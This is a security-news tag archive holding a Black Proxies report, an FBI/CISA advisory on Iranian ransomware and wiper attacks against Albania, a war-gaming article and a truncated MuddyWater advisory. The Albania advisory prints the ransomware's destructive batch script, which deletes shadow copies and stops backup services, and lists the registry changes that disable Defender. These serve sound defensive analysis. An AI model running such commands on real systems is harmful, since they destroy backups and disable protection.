Tag Archive for: Conduct

‘Black Proxies’ Enable Threat Actors to Conduct Malicious Activity


Threat actors have been spotted using criminal proxy networks to obfuscate their illegal activities by hiding behind hijacked IP addresses and using the same to create an appearance of legitimacy.

The findings come from security researchers at DomainTools, who have said that while these networks were initially used as part of botnets, their lucrative nature has turned them into their own criminal enterprises.

Describing the new threat in an advisory published on Thursday, the DomainTools team said it spotted a new and particularly dangerous proxy service called ‘Black Proxies,’ which is being marketed to other cyber-criminals for its reliability, scope and vast number of IP addresses.

“Black Proxies market themselves as having over 1,000,000 residential and other proxy IP addresses ‘from all around the world.’ The scope and scale of these new offerings show just how large their claimed pool of IP space is,” DomainTools wrote.

“Upon further examination through the service, their pool of IP addresses listed in fall of 2022 ‘online’ comes in at just over 180,000 IPs, which is still a factor larger than the traditional services based on other types of tactics and botnets.”

According to the advisory, the Black Proxies’ scale is significant because of not only their focus on both the traditional forms of IP proxying but also their use of compromised websites for their services.

“Ultimately, in the cybercrime ecosystem, there are a host of specialized services designed to enable malicious activity,” reads the report.

The researchers also added that understanding these newer malicious proxy services and how they facilitate the efforts of other cyber-criminals is critical in order to combat them.

“For defenders looking to protect their organizations and users from these types of proxy network services, the key is to focus on defense in depth, applying different detection methods to help identify anomalous and potentially malicious behavior,” concluded the report.

Malicious domains were also at the center of a typosquat campaign uncovered in October, which highlighted attacks targeting Windows and Android users mimicking 27 brands.

Source…

Iranian State Actors Conduct Cyber Operations Against the Government of Albania


The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks. Additional information concerning files used by the actors during their exploitation of and cyber attack against the victim organization is provided in Appendices A and B.

In July 2022, Iranian state cyber actors—identifying as “HomeLand Justice”—launched a destructive cyber attack against the Government of Albania which rendered websites and services unavailable. A FBI investigation indicates Iranian state cyber actors acquired initial access to the victim’s network approximately 14 months before launching the destructive cyber attack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous network access for approximately a year, periodically accessing and exfiltrating e-mail content.

Between May and June 2022, Iranian state cyber actors conducted lateral movements, network reconnaissance, and credential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks, leaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond to the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.

In June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. On July 18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022, Homeland Justice posted videos of the cyber attack on their website. From late July to mid-August 2022, social media accounts associated with HomeLand Justice demonstrated a repeated pattern of advertising Albanian Government information for release, posting a poll asking respondents to select the government information to be released by HomeLand Justice, and then releasing that information—either in a .zip file or a video of a screen recording with the documents shown.

In September 2022, Iranian cyber actors launched another wave of cyber attacks against the Government of Albania, using similar TTPs and malware as the cyber attacks in July. These were likely done in retaliation for public attribution of the cyber attacks in July and severed diplomatic ties between Albania and Iran.

Download the PDF version of this report: pdf, 1221 kb

Initial access

Timeframe: Approximately 14 months before encryption and wiper attacks.

Details: Initial access was obtained via exploitation of an Internet-facing Microsoft SharePoint, exploiting CVE-2019-0604.

Persistence and Lateral movement

Timeframe: Approximately several days to two months after initial compromise.

Details: After obtaining access to the victim environment, the actors used several .aspx webshells, pickers.aspx, error4.aspx, and ClientBin.aspx, to maintain persistence. During this timeframe, the actors also used RDP (primarily), SMB, and FTP for lateral movement throughout the victim environment.

Exchange Server compromise

Timeframe: Approximately 1-6 months after initial compromise.

Details: The actors used a compromised Microsoft Exchange account to run searches (via CmdLets New-MailboxSearch and Get-Recipient) on various mailboxes, including for administrator accounts. In this timeframe, the actors used the compromised account to create a new Exchange account and add it to the Organization Management role group.

Likely Email exfiltration

Timeframe: Approximately 8 months after initial compromise.

Details: The actors made thousands of HTTP POST requests to Exchange servers of the victim organization. The FBI observed the client transferring roughly 70-160 MB of data, and the server transferring roughly 3-20 GB of data.

VPN activity

Timeframe: Approximately 12-14 months after initial compromise.

Details: Approximately twelve months after initial access and two months before launching the destructive cyber attack, the actors made connections to IP addresses belonging to the victim organization’s Virtual Private Network (VPN) appliance. The actors’ activity primarily involved two compromised accounts. The actors executed the “Advanced Port Scanner” (advanced_port_scanner.exe). The FBI also found evidence of Mimikatz usage and LSASS dumping.

File Cryptor (ransomware-style file encryptor)

Timeframe: Approximately 14 months after initial compromise.

Details: For the encryption component of the cyber attack, the actor logged in to a victim organization print server via RDP and kicked off a process (Mellona.exe) which would propagate the GoXml.exe encryptor to a list of internal machines, along with a persistence script called win.bat. As deployed, GoXML.exe encrypted all files (except those having extensions .exe, .dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder impacted.

Wiper attack

Timeframe: Approximately 14 months after initial compromise.

Details: In the same timeframe as the encryption attack, the actors began actions that resulted in raw disk drives being wiped with the Disk Wiper tool (cl.exe) described in Appendix A. Approximately over the next eight hours, numerous RDP connections were logged from an identified victim server to other hosts on the victim’s network. Command line execution of cl.exe was observed in cached bitmap files from these RDP sessions on the victim server.

  • Ensure anti-virus and anti-malware software is enabled and signature definitions are updated regularly and in a timely manner. Well-maintained anti-virus software may prevent use of commonly deployed cyber attacker tools that are delivered via spear-phishing.
  • Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spear-phishing attacks.
  • If your organization is employing certain types of software and appliances vulnerable to known Common Vulnerabilities and Exposures (CVEs), ensure those vulnerabilities are patched. Prioritize patching known exploited vulnerabilities.
  • Monitor for unusually large amounts of data (i.e. several GB) being transferred from a Microsoft Exchange server.
  • Check the host-based indications, including webshells, for positive hits within your environment.

Additionally, FBI and CISA recommend organizations apply the following best practices to reduce risk of compromise:

  • Maintain and test an incident response plan.
  • Ensure your organization has a vulnerability management program in place and that it prioritizes patch management and vulnerability scanning of known exploited vulnerabilities. Note: CISA’s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.
  • Properly configure and secure internet-facing network devices.
    • Do not expose management interfaces to the internet.
    • Disable unused or unnecessary network ports and protocols.
    • Disable/remove unused network services and devices.
  • Adopt zero-trust principles and architecture, including:
    • Micro-segmenting networks and functions to limit or block lateral movements.
    • Enforcing phishing-resistant multifactor authentication (MFA) for all users and VPN connections.
    • Restricting access to trusted devices and users on the networks.

For more information on Iranian government-sponsored malicious cyber activity, see CISA’s webpage – Iran Cyber Threat Overview and Advisories.

Appendix A

Host-based IOCs

Additional details concerning some of these files are provided in Appendix B.

File

MD5 Hash

Notes

Error4.aspx

81e123351eb80e605ad73268a5653ff3

Webshell

cl.exe

7b71764236f244ae971742ee1bc6b098

Wiper

GoXML.exe

bbe983dba3bf319621b447618548b740

Encryptor

Goxml.jpg

0738242a521bdfe1f3ecc173f1726aa1

 

ClientBin.aspx

a9fa6cfdba41c57d8094545e9b56db36

Webshell (reverse-proxy connections)

Pickers.aspx

8f766dea3afd410ebcd5df5994a3c571

Webshell

evaluatesiteupgrade.cs.aspx

Unknown

Webshell

mellona.exe

78562ba0069d4235f28efd01e3f32a82

Propagation for Encryptor

win.bat

1635e1acd72809479e21b0ac5497a79b

Launches GoXml.exe on startup

win.bat

18e01dee14167c1cf8a58b6a648ee049

Changes desktop background to encryption image

bb.bat

59a85e8ec23ef5b5c215cd5c8e5bc2ab

Saves SAM and SYSTEM hives to C:\Temp, makes cab archive

disable_defender.exe

60afb1e62ac61424a542b8c7b4d2cf01

Disables Windows Defender

rwdsk.sys

8f6e7653807ebb57ecc549cef991d505

Raw disk driver utilized by wiper malware

App_Web_bckwssht.dll

e9b6ecbf0783fa9d6981bba76d949c94

 

 

Network-based IOCs

FBI review of Commercial VPN service IP addresses revealed the following resolutions (per Akamai data):

Country

Company

AL

KEMINET LTD.

DE

NOOP-84-247-59-0-25

DE

GSL NETWORKS

GB

LON-CLIENTS

GB

GB-DATACENTER

NL

NL-LAYERSWITCH-20190220

NL

PANQ-45-86-200-0

US

PRIVATE CUSTOMER

US

BANDITO NETWORKS

US

EXTERNAL

US

RU-SELENA-20080725

US

TRANS OCEAN NETWORK

Appendix B

Ransomware Cryptor

GoXML.exe is a ransomware style file encryptor. It is a Windows executable, digitally signed with a certificate issued to the Kuwait Telecommunications Company KSC, a subsidiary of Saudi Telecommunications Company (STC).

If executed with five or more arguments (the arguments can be anything, as long as there are five or more), the program silently engages its file encryption functionality. Otherwise, a file-open dialog Window is presented, and any opened documents receive an error prompt labeled, Xml Form Builder.

All internal strings are encrypted with a hard coded RC4 key. Before internal data is decrypted, the string decryption routine has a built-in self-test that decrypts a DWORD value and tests to see if the plaintext is the string yes. If so, it will continue to decode its internal strings.

The ransomware will attempt to launch the following batch script; however, this will fail due to a syntax error.

@for /F “skip=1” %C in (‘wmic LogicalDisk get DeviceID’) do (@wmic /namespace:\\root\default Path SystemRestore Call disable “%C\” & @rd /s /q %C\$Recycle.bin)

@vssadmin.exe delete shadows /all /quiet

@set SrvLst=vss sql svc$ memtas mepos sophos veeam backup GxVss GxBlr GxFWD GxCVD GxCIMgr DefWatch ccEvtMgr ccSetMgr SavRoam RTVscan QBFCService QBIDPService ntuit.QuickBooks.FCS QBCFMonitorService YooBackup YooIT zhudongfangyu sophos stc_raw_agent VSNAPVSS VeeamTransportSvc VeeamDeploymentService VeeamNFSSvc veeam PDVFSService BackupExecVSSProvider BackupExecAgentAccelerator BackupExecAgentBrowser BackupExecDiveciMediaService BackupExecJobEngine BackupExecManagementService BackupExecRPCService AcrSch2Svc AcronisAgent CASAD2DWebSvc CAARCUpdateSvc

@for %C in (%SrvLst%) do @net stop %C

@set SrvLst=

@set PrcLst=mysql sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc xfssvccon mydesktopservice ocautoupds encsvc tbirdconfig mydesktopqos ocomm dbeng50 sqbcoreservice excel infopath msaccess mspub onenote outlook powerpnt steam thebat thunderbird visio winword wordpad notepad

@for %C in (%PrcLst%) do @taskkill /f /im “%C.exe”

@set PrcLst=

@exit

 

The syntax error consists of a missing backslash that separates system32 and cmd.exe, so the process is launched as system32cmd.exe which is an invalid command.

Script Launch Bug

 

The ransomware’s file encryption routine will generate a random string, take the MD5 hash and use that to generate an RC4 128 key which is used to encrypt files. This key is encrypted with a hard coded Public RSA key and converted to Base64 utilizing a custom alphabet. This is appended to the end of the ransom note.

The cryptor places a file called How_To_Unlock_MyFiles.txt in directories with encrypted files.

Each encrypted file is given the .lck extension and the contents of each file are only encrypted up to 0x100000 or 1,048,576 bytes which is a hard coded limit.

Separately, the actor ran a batch script (win.bat below) to set a specific desktop background.

File Details

GoXml.exe

File Size:

43.48 KB (44520 bytes)

SHA256:

f116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5

SHA1:

5d117d8ef075f3f8ed1d4edcc0771a2a0886a376

MD5:

bbe983dba3bf319621b447618548b740

SSDeep:

768:+OFu8Q3w6QzfR5Jni6SQD7qSFDs6P93/q0XIc/UB5EPABWX

:RFu8QAFzffJui79f13/AnB5EPAkX (Ver 1.1)

File Type:

PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows

PE Header Timestamp:

2016-04-30 17:08:19

ImpHash:

5b2ce9270beea5915ec9adbcd0dbb070

Cert #0 Subject C=KW, L=Salmiya, O=Kuwait Telecommunications Company KSC, OU=Kuwait Telecommunications Company, CN=Kuwait Telecommunications Company KSC

Cert #0 Issuer  C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Assured ID Code Signing CA

Cert #0 SHA1    55d90ec44b97b64b6dd4e3aee4d1585d6b14b26f

 

win.bat (#1, run malware)

File Size:

67 bytes

SHA256:

bad65769c0b416bb16a82b5be11f1d4788239f8b2ba77ae57948b53a69e230a6

SHA1:

14b8c155e01f25e749a9726958606b242c8624b9

MD5:

1635e1acd72809479e21b0ac5497a79b

SSDeep:

3:LjTFKCkRErG+fyM1KDCFUF82G:r0aH1+DF82G (Ver 1.1)

File Type:

ASCII text, with no line terminators

Contents:

start /min C:\ProgramData\Microsoft\Windows\GoXml.exe 1 2 3 4 5 6 7

 

win.bat (#2, install desktop image)

Filename:

ec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2

File Size:

765 bytes

SHA256:

ec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2

SHA1:

fce0db6e66d227d3b82d4564446ede0c0fd7598c

MD5:

18e01dee14167c1cf8a58b6a648ee049

SSDeep:

12:wbYVJ69/TsdLd6sdLd3mTDwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV

+Et:wq69/kZxZ3mTDY9HY9HY9HY9HY9j (Ver 1.1)

File Type:

DOS batch file text, ASCII text, with CRLF line terminators

Contents:

@echo off

setlocal enabledelayedexpansion

set “Wtime=!time:~0,2!”

if “!Wtime!” leq “20” reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /t REG_SZ /d “c:\programdata\GoXml.jpg” /f & goto done

if “!Wtime!” geq “20” reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /t REG_SZ /d “c:\programdata\GoXml.jpg” /f & goto done

:done

timeout /t 5 >nul

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

endlocal

 

goxml.jpg

File Size:

1.2 MB (1259040 bytes)

SHA256:

63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9

SHA1:

683eaec2b3bb5436f00b2172e287dc95e2ff2266

MD5:

0738242a521bdfe1f3ecc173f1726aa1

SSDeep:

12288:ME0p1RE70zxntT/ylTyaaSMn2fS+0M6puxKfJbDKrCxMe5fPSC2tmx

VjpJT/n37p:MHyUt7yQaaPXS6pjar+MwrjpJ7VIbZg (Ver 1.1)

File Type:

JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484], progressive, precision 8, 2484×1752, components 4

Software:

Adobe Photoshop 22.4 (Windows)

Modify Date:

2022-07-13 20:45:20

Create Date:

2020-06-11 02:13:33

Metadata Date:

2022-07-13 20:45:20

Profile Date Time:

2000-07-26 05:41:53

Image Size:

2484×1752

File Size:

1.2 MB (1259040 bytes)

SHA256:

63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9

Disk Wiper

The files cl.exe and rwdsk.sys are part of a disk wiper utility that provides raw access to the hard drive for the purposes of wiping data. From the command line the cl.exe file accepts the arguments:

  • in
  • un
  • wp <optional argument>

If executed with the in command, the utility will output in start! and installs a hard coded file named rwdsk.sys as a service named RawDisk3. The .SYS file is not extracted from the installer however, but rather the installer looks for the file in the same directory that the cl.exe is executed in. 

It will also load the driver after installation.

The un command uninstalls the service, outputting the message “un start!” to the terminal.
The wp command will access the loaded driver for raw disk access.

Raw Disk Access

The long hexadecimal string is hard coded in the cl.exe binary.

      RawDisk3File = (void *)toOpenRawDisk3File(

                               arg2_WideCharStr,

                               0xC0000000,

                               L”B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D”);

      ptrRawDiskFile = RawDisk3File;

      if ( RawDisk3File )

      {

        sizeDisk = toGetDiskSize(RawDisk3File);

        terminal_out(“Total Bytez : %lld\n”, sizeDisk << 9);

The wp command also takes an additional argument as a device path to place after \RawDisk3\ in the output string. It is uncertain what creates this path to a device as the driver tested did not.

The output is “wp starts!” followed by the total bytes of the drive and the time the wipe operation takes.

If the registry key value HKLM\SOFTWARE\EldoS\EventLog is set to “Enabled”, the install will generate an event log if at any time the install produces an error. This log contains an error code DWORD followed by the string ..\..\DriverLibraries\DrvSupLib\install.c. If the system does not have the SOFTWARE\EldoS key, no event logs would be produced. This feature must be a related to the legitimate EldoS utility. 

rwdsk.sys is a “legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer’s hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.”

File Details

cl.exe

 

File Size

142.5 KB (145920 bytes)

SHA256

e1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0

SHA1

f22a7ec80fbfdc4d8ed796119c76bfac01e0a908

MD5

7b71764236f244ae971742ee1bc6b098

SSDeep

3072:vv2ADi7yOcE/YMBSZ0fZX4kpK1OhJrDwM:vv2jeQ/flfZbKM (Ver 1.1)

Filetype

PE32+ executable (console) x86-64, for MS Windows

PE Header Timestamp

2022-07-15 13:26:28

ImpHash

58d51c1152817ca3dec77f2eee52cbef

 

rwdsk.sys

 

File Size

38.84 KB (39776 bytes)

SHA256

3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6

SHA1

5e061701b14faf9adec9dd0b2423ff3cfc18764b

MD5

8f6e7653807ebb57ecc549cef991d505

SSDeep

768:E31ySCpoCbXnfDbEaJSooKIDyE9aBazWlEAusxsia:0gyCb3MFKIHO4Ausxta (Ver 1.1)

Filetype

PE32+ executable (native) x86-64, for MS Windows

PEtype

Driver

PE Header Timestamp

2016-03-18 14:44:54

ImpHash

e233f2cdc91faafe1467d9e52f166213

Cert #0 Subject

CN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US

Cert #0 Issuer

CN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US

Cert #0 SHA1

382c18388fb326221dfd7a77ee874f9ba60e04bf

Cert #1 Subject

C=US, ST=California, L=SANTA CLARA, O=NVIDIA Corporation, CN=NVIDIA Corporation

Cert #1 Issuer

C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA

Cert #1 SHA1

30632ea310114105969d0bda28fdce267104754f

Cert #2 Subject

C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. – For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority – G5

Cert #2 Issuer

C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Code Verification Root

Cert #2 SHA1

57534ccc33914c41f70e2cbb2103a1db18817d8b

Cert #3 Subject

C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA

Cert #3 Issuer

C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. – For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority – G5

Cert #3 SHA1

495847a93187cfb8c71f840cb7b41497ad95c64f

 

Additional Files

Web Deployed Reverse Proxy

Description

ClientBin.aspx is an ASP file that contains a Base64 encoded .Net executable (App_Web_bckwssht.dll) that it decodes and loads via Reflection. The .Net executable contains Class and Method obfuscation and internal strings are encoded with a single byte XOR obfuscation.

public static string hair_school_bracket()
        {
            return Umbrella_admit_arctic.rebel_sadreporthospital(“460F2830272A2F2266052928202F21661627252D27212368”);  //Invalid Config Package.
        }

public static string Visual_math_already()
        {
       return Umbrella_admit_arctic.rebel_sadreporthospital(“5304057E0116001607”);   //WV-RESET

The method rebel_sadreporthospital takes the first byte of the encoded string and XOR’s each subsequent byte to produce the de-obfuscated string.

When run in context of an IIS web server connecting to the ASPX file will generate a 200 <Encryption DLL Info> 1.5 output.
 

Initial connection

The hex string represents the following ASCII text:

Base64, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null

Sending a POST request with a Base64 encoded IP and port will open a second socket to the supplied IP and port making this a Web proxy. 

Second Socket Opened from POST Request

Sending a request to WV-RESET with a value will produce an OK response and call a function to shut down the proxy socket.

Terminate socket

The DLL extracts a secondary “EncryptionDLL” named Base64.dll which is loaded via Assembly.Load. This exposes two functions, encrypt and decrypt. This DLL is used to decrypt the Proxy IP and port along with data. In this instance the class name is misspelled Bsae64, which is also reflected in the calling DLLs decoded strings. It is uncertain as to why an additional Base64.dll binary is extracted when the same encoding could be hard coded in the original DLL. It is possible other versions of this tool utilize differing “EncryptionDLL” binaries.
 

Misspelled Class Name
Called Misspelled Name

File Details

ClientBin.aspx

 

File Size

55.24 KB (56561 bytes)

SHA256

7ad64b64e0a4e510be42ba631868bbda8779139dc0daad9395ab048306cc83c5

SHA1

e03edd9114e7a0138d1309034cad6b461ab0035b

MD5

a9fa6cfdba41c57d8094545e9b56db36

SSDeep

768:x9TfK6nOgo5zE/cezUijAwZIFxK1mGjncrF8EAZ0iBDZBZdywb0DwHN4N4wjMxr8:x9TfdOgAi2 (Ver 1.1)

Filetype

HTML document text, ASCII text, with very long lines (56458)

 

App_Web_bckwssht.dll

 

File Size

41.0 KB (41984 bytes)

SHA256

cad2bc224108142b5aa19d787c19df236b0d12c779273d05f9b0298a63dc1fe5

SHA1

49fd8de33aa0ea0c7432d62f1ddca832fab25325

MD5

e9b6ecbf0783fa9d6981bba76d949c94

SSDeep

384:coY4jnD7l9VAk1dtrGBlLGYEX1tah8dgNyamGOvMTfdYN5qZAsP:hlXAkHRGBlUUh8cFmpv6feYLP (Ver 1.1)

Filetype

PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows

PEtype

DLL

PE Header Timestamp

2021-06-07 10:37:55

ImpHash

dae02f32a21e03ce65412f6e56942daa

Disable Defender

Description

disable_defender.exe is a Microsoft Windows PE file that attempts to disable Windows Defender. The application will elevate privileges to that of SYSTEM and then attempt to disable Defender’s core functions. A command prompt with status and error messages is displayed as the application executes. No network activity was detected during the evaluation.

Upon execution, a command prompt is launched and a message is displayed if the process is not running as SYSTEM. The process is then restarted with the required permissions.

Test validate permissions

The application will attempt to terminate the Windows Defender process by calling TerminateProcess for smartscreen.exe:

Attempt to kill Windows Defender

The following Registry Keys were modified to disable Windows Defender:

Set Registry Values (observed Win10 1709)

 

HKLM\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection 

 

 

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware 

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
StartupApproved\Run\SecurityHealth 

03 00 00 00 5D 02 00 00 41 3B 47 9D 

HKLM\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware 

HKLM\System\CurrentControlSet\Services\WinDefend\Start 

HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\
DisableRealtimeMonitoring 

Upon completion and if successful the application will display the following messages and wait for user input.

User Input

disable-defender.exe

 

File Size

292.0 KB (299008 bytes)

SHA256

45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace

SHA1

e866cc6b1507f21f688ecc2ef15a64e413743da7

MD5

60afb1e62ac61424a542b8c7b4d2cf01

SSDeep

6144:t2WhikbJZc+Wrbe/t1zT/p03BuGJ1oh7ISCLun:t2WpZnW+/tVoJ1ouQ (Ver 1.1)

Filetype

PE32+ executable (console) x86-64, for MS Windows

PEtype

EXE

PE Header Timestamp

2021-10-24 15:07:32

ImpHash

74a6ef9e7b49c71341e439022f643c8e

Source…

How to conduct a cyber-war gaming exercise


Defenses are in place, and a cybersecurity strategy has been designed. But how does your organization know they work? Conducting a cyber-war game can expose any shortcomings a real attacker may uncover.

Most cybersecurity professionals are aware they need to conduct cyber-war gaming exercises to ensure overall cybersecurity readiness. But questions remain about how to conduct this exercise, including the following:

  • What should the cyber-war games include?
  • How often should they be conducted?
  • Who should participate?
  • What documentation is required?
  • What should the end results and deliverables look like?

Let’s look at what’s needed for successful cyber-war game exercises, starting with what they are and why businesses should conduct them.

Characteristics of an effective cyber-war game

Cyber-war games are creative exercises in which an incident response team reacts to a hypothetical set of scenarios.

The military has long conducted war games, also known as tactical decision games, because they work. Participants learn to understand the unintended consequences of decisions in the context of the chaos of warfare. As the military adage attributed to Prussian Field Marshal Helmuth von Moltke the Elder goes, “No plan survives first contact with the enemy.”

Now, take those lessons, and adopt them for cyber-war gaming. One important element to conduct effective cyber-war games is to develop scenarios that incorporate multiple unplanned events and generate perfect-storm scenarios. For instance, what if the attack vector is an IoT network and an attack on the connected HVAC system brought the data center down? Or what if a Session Initiation Protocol man-in-the-middle attack compromised sensitive voice calls, while a DDoS attack took down the email server? Or what if a key person is out with the flu?

Another important element is how often the exercises are held. Conducting cyber-war gaming on a regular basis is key — ideally, quarterly but minimally annually. It’s less important to craft the perfect game than it is to conduct cyber-war gaming early and often, learning and improving as you go.

Critical cyber-war gaming roles

The two most important roles in cyber-war gaming are…

Source…

Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks


Summary

Actions to Take Today to Protect Against Malicious Activity
* Search for indicators of compromise.
* Use antivirus software.
*
Patch all systems.
* Prioritize patching known exploited vulnerabilities.
* Train users to recognize and report phishing attempts.
* Use multi-factor authentication.

Note: this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. Note: MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.

MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[1] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.

MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their malicious activity. 

This advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks. 

FBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. Note: also see the Additional Resources section.

Click here for a PDF version of this report.

Technical Details

FBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. 

As part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious file to the victim’s network [T1566.001, T1204.002]. MuddyWater actors also use techniques such as side-loading DLLs [T1574.002] to trick legitimate programs into running malware and obfuscating PowerShell scripts [T1059.001] to hide C2 functions [T1027] (see the PowGoop section for more information). 

Additionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS—for loading malware, backdoor access, persistence [TA0003], and exfiltration [TA0010]. See below for descriptions of some of these malware sets, including newer tools or variants to the group’s suite. Additionally, see Malware Analysis Report MAR-10369127.r1.v1: MuddyWater for further details.

PowGoop

MuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.

According to samples of PowGoop analyzed by CISA and CNMF, PowGoop consists of three components:

  • A DLL file renamed as a legitimate filename, Goopdate.dll, to enable the DLL side-loading technique [T1574.002]. The DLL file is contained within an executable, GoogleUpdate.exe
  • A PowerShell script, obfuscated as a .dat file, goopdate.dat, used to decrypt and run a second obfuscated PowerShell script, config.txt [T1059.001].
  • config.txt, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.

These components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. 

Small Sieve

According to a sample analyzed by NCSC-UK, Small Sieve is a simple Python [T1059.006] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, gram_app.exe. The NSIS installs the Python backdoor, index.exe, and adds it as a registry run key [T1547.001], enabling persistence [TA0003]. 

MuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft’s Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., “Microsift”) and Outlook in its filenames associated with Small Sieve [T1036.005].

